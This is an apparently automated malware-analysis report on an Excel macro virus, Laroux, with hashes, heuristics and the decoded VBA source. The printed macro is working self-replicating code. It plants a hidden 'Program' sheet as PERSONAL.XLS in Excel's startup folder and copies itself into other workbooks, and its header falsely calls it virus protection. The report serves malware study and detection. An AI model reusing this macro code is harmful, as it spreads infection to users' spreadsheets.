Xls.Trojan.Laroux-30 — Office (OLE) malware analysis

Static analysis result for SHA-256 0118c3b2936a1b2b…

MALICIOUS

Office (OLE)

Size: 30.0 KB
Authoring application: Microsoft Excel
First seen: 2012-06-14
MD5: 5630403828aa7ac81318f5b468ef1414
SHA-1: c89d76c0f1427f301039c7e29d678eb5a176247a
SHA-256: 0118c3b2936a1b2bd8d81b92ca18fa8b555da894c40768a6ce8a4a08427c1326
Risk Score: 180

Malware Insights

Xls.Trojan.Laroux-30 · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment

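ClamAV identifies the file as malicious with the signature Xls.Trojan.Laroux-30. It contains a VBA macro with an Auto_Open subroutine, a common technique for executing malicious code when the document is opened. In the extracted source, auto_open sets Application.OnSheetActivate to check_files. If PERSONAL.XLS is absent from Application.StartupPath and the active workbook contains modules, check_files saves a copy of the "Program" sheet there as PERSONAL.XLS, indicating an attempt to establish persistence or facilitate further execution. If PERSONAL.XLS is present and the active workbook contains no modules, it copies the "Program" sheet from PERSONAL.XLS into that workbook and hides it, unless the workbook's first sheet is already named "Program".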

Heuristics 3

  • ClamAV: Xls.Trojan.Laroux-30 (critical; CLAMAV_DETECTION)
    ClamAV detected this file as malware: Xls.Trojan.Laroux-30
  • VBA macros detected (medium; 1 related finding; OLE_VBA_MACROS)
    Document contains VBA macro code
  • Auto_Open macro (high; OLE_VBA_AUTO)
    Auto_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 5877 bytes
SHA-256: 5d6658707173ecdd2a39ce5c4d8f44664b4b42ef6d8aba2479f853db7dd44566
Detection
ClamAV: Xls.Trojan.Laroux-30
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Program"

'
' This macro program for virus protection & Schedule control program
'       by Burinthorn  Thong-o.
'
'
'This part for declaration globle variable
'
Dim First_col, Last_col As Integer
    Const start_row = 22
    Const finish_row = 66
    Const start_col = 18
    Const finish_col = 50
'
'end section
'

Sub auto_open()
Attribute auto_open.VB_ProcData.VB_Invoke_Func = " \n14"
    Application.OnSheetActivate = "check_files"
End Sub

Sub check_files()
Attribute check_files.VB_ProcData.VB_Invoke_Func = " \n14"
    c$ = Application.StartupPath
    m$ = Dir(c$ & "\" & "PERSONAL.XLS")
    If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
    If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
    whichfile = p + w * 10
    Select Case whichfile
    Case 10
        Application.ScreenUpdating = False
        n4$ = ActiveWorkbook.Name
        Sheets("Program").Visible = True
        Sheets("Program").Select
        Sheets("Program").Copy
        With ActiveWorkbook
            .Title = ""
            .Subject = ""
            .Author = ""
            .Keywords = ""
            .Comments = ""
        End With
        newname$ = ActiveWorkbook.Name
        c4$ = CurDir()
        ChDir Application.StartupPath
        ActiveWindow.Visible = False
        Workbooks(newname$).SaveAs Filename:=Application.StartupPath & "/" & "PERSONAL.XLS", _
                FileFormat:=xlNormal, password:="", writerespassword:="", _
                ReadOnlyRecommended:=False, CreateBackup:=False
        ChDir c4$
        Workbooks(n4$).Sheets("Program").Visible = False
        Application.OnSheetActivate = ""
        Application.ScreenUpdating = True
        Application.OnSheetActivate = "personal.xls!check_files"
    Case 1
        Application.ScreenUpdating = False
        n4$ = ActiveWorkbook.Name
        p4$ = ActiveWorkbook.Path
        s$ = Workbooks(n4$).Sheets(1).Name
        If s$ <> "Program" Then
            Workbooks("PERSONAL.XLS").Sheets("Program").Copy before:=Workbooks(n4$).Sheets(1)
            Workbooks(n4$).Sheets("Program").Visible = False
        Else
        End If
        Application.OnSheetActivate = ""
        Application.ScreenUpdating = True
        Application.OnSheetActivate = "personal.xls!check_files"
    Case Else
    End Select
End Sub

Sub C_Paint()
Attribute C_Paint.VB_ProcData.VB_Invoke_Func = " \n14"
    Selection.Interior.ColorIndex = xlNone
    Selection.Font.ColorIndex = 0
    With Selection.Borders(xlRight)
        .Weight = xlThin
        .ColorIndex = xlAutomatic
    End With
End Sub

Function Get_rng(Pmt)
Attribute Get_rng.VB_ProcData.VB_Invoke_Func = " \n14"
    Set Get_rng = Application.InputBox(prompt:=Pmt, _
        Title:="Input Range Dialoque!", Type:=8)
End Function

Sub Underline()
Attribute Underline.VB_ProcData.VB_Invoke_Func = " \n14"
    ActiveCell.Offset(1, 3).Font.Underline = xlDouble
End Sub

Function actv_sheet(sht)
Attribute actv_sheet.VB_ProcData.VB_Invoke_Func = " \n14"
    If Not (Worksheets(sht).Activate) Then
        Worksheets(sht).Select
    End If
End Function

Function Begin_col(Rw) As Integer
Attribute Begin_col.VB_ProcData.VB_Invoke_Func = " \n14"
Dim Counter As Integer
    Counter = 1
    Do While (Cells(Rw, Counter).Interior.ColorIndex = xlNone)
        Counter = Counter + 1
        If Counter > 49 Then
            Exit Do
        End If
    Loop
    Begin_col = Counter
    If Begin_col < First_col Then
        First_col = Begin_col
    End If
End Function

Function End_col(Rw, Beg)
Attribute End_col.VB_ProcData.VB_Invoke_Func = " \n14"
Dim i As Integer
    For i = Beg To 50 Step 1
        If Cells(Rw, i).Interior.ColorIndex = xlNone Then
            Exit For
        End If
    End_col = i
    Next i
    If End_col > Last_col Then
        Last_col = End_col
    End If
End Function

Function Put_on(Rw, fag)
Attribute Put_on.VB_ProcData.VB_Invoke_Func = " \n14"
Dim Beg_time, End_time As Integer
    If Not (Cells(Rw, 5
... (truncated)